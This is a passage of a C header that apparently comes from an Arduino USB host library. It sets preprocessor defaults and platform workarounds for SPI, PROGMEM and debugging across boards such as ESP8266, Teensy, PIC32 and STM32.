#ifndef GCC_VERSION 106 | #define GCC_VERSION (__GNUC__ * 10000 + __GNUC_MINOR__ * 100 + __GNUC_PATCHLEVEL__) 107 | #endif 108 | #if GCC_VERSION < 40602 // Test for GCC < 4.6.2 109 | #ifdef PROGMEM 110 | #undef PROGMEM 111 | #define PROGMEM __attribute__((section(".progmem.data"))) // Workaround for http://gcc.gnu.org/bugzilla/show_bug.cgi?id=34734#c4 112 | #ifdef PSTR 113 | #undef PSTR 114 | #define PSTR(s) (__extension__({static const char __c[] PROGMEM = (s); &__c[0];})) // Copied from pgmspace.h in avr-libc source 115 | #endif 116 | #endif 117 | #endif 118 | #endif 119 | 120 | #if !defined(DEBUG_USB_HOST) && ENABLE_UHS_DEBUGGING 121 | #define DEBUG_USB_HOST 122 | #endif 123 | 124 | #if !defined(WIICAMERA) && ENABLE_WII_IR_CAMERA 125 | #define WIICAMERA 126 | #endif 127 | 128 | // To use some other locking (e.g. freertos), 129 | // define XMEM_ACQUIRE_SPI and XMEM_RELEASE_SPI to point to your lock and unlock. 130 | // NOTE: NO argument is passed. You have to do this within your routine for 131 | // whatever you are using to lock and unlock. 132 | #if !defined(XMEM_ACQUIRE_SPI) 133 | #if USE_XMEM_SPI_LOCK || defined(USE_MULTIPLE_APP_API) 134 | #include 135 | #else 136 | #define XMEM_ACQUIRE_SPI() (void(0)) 137 | #define XMEM_RELEASE_SPI() (void(0)) 138 | #endif 139 | #endif 140 | 141 | #if !defined(EXT_RAM) && defined(EXT_RAM_STACK) || defined(EXT_RAM_HEAP) 142 | #include 143 | #else 144 | #define EXT_RAM 0 145 | #endif 146 | 147 | #if defined(CORE_TEENSY) && defined(KINETISK) 148 | #define USING_SPI4TEENSY3 USE_SPI4TEENSY3 149 | #else 150 | #define USING_SPI4TEENSY3 0 151 | #endif 152 | 153 | #if ((defined(ARDUINO_SAM_DUE) && defined(__SAM3X8E__)) || defined(__ARDUINO_X86__) || ARDUINO >= 10600) && !USING_SPI4TEENSY3 154 | #include "../../include/SPI.h" // Use the Arduino SPI library for the Arduino Due, Intel Galileo 1 & 2, Intel Edison or if the SPI library with transaction is available 155 | #endif 156 | #ifdef RBL_NRF51822 157 | #include 158 | #include 159 | #define SPI SPI_Master 160 | #define MFK_CASTUINT8T (uint8_t) // RBLs return type for sizeof needs casting to uint8_t 161 | #endif 162 | #if defined(__PIC32MX__) || defined(__PIC32MZ__) 163 | #include <../../../../hardware/pic32/libraries/SPI/SPI.h> // Hack to use the SPI library 164 | #endif 165 | 166 | #if defined(ESP8266) || defined(ESP32) 167 | #define MFK_CASTUINT8T (uint8_t) // ESP return type for sizeof needs casting to uint8_t 168 | #endif 169 | 170 | #ifdef STM32F4 171 | #include "stm32f4xx_hal.h" 172 | extern SPI_HandleTypeDef SPI_Handle; // Needed to be declared in your main.cpp 173 | #endif 174 | 175 | // Fix defines on Arduino Due 176 | #ifdef ARDUINO_SAM_DUE 177 | #ifdef tokSETUP 178 | #undef tokSETUP 179 | #endif 180 | #ifdef tokIN 181 | #undef tokIN 182 | #endif 183 | #ifdef tokOUT 184 | #undef tokOUT 185 | #endif 186 | #ifdef tokINHS 187 | #undef tokINHS 188 | #endif 189 | #ifdef tokOUTHS 190 | #undef tokOUTHS 191 | #endif 192 | #endif 193 | 194 | // Set defaults 195 | #ifndef MFK_CASTUINT8T 196 | #define MFK_CASTUINT8T 197 | #endif 198 | 199 | // Workaround issue: https://github.com/esp8266/Arduino/issues/2078 200 | #ifdef ESP8266 201 | #undef PROGMEM 202 | #define PROGMEM 203 | #undef PSTR 204 | #define PSTR(s) (s) 205 | #undef pgm_read_byte 206 | #define pgm_read_byte(addr) (*reinterpret_cast(addr)) 207 | #undef pgm_read_word 208 | #define pgm_read_word(addr) (*reinterpret_cast(addr)) 209 | #endif 210 | 211 | #ifdef ARDUINO_ESP8266_WIFIO 212 | #error "This board is currently not supported" 213 | #endif 214 | 215 | #endif /* SETTINGS_H */ 216 | --------------------------------------------------------------------------------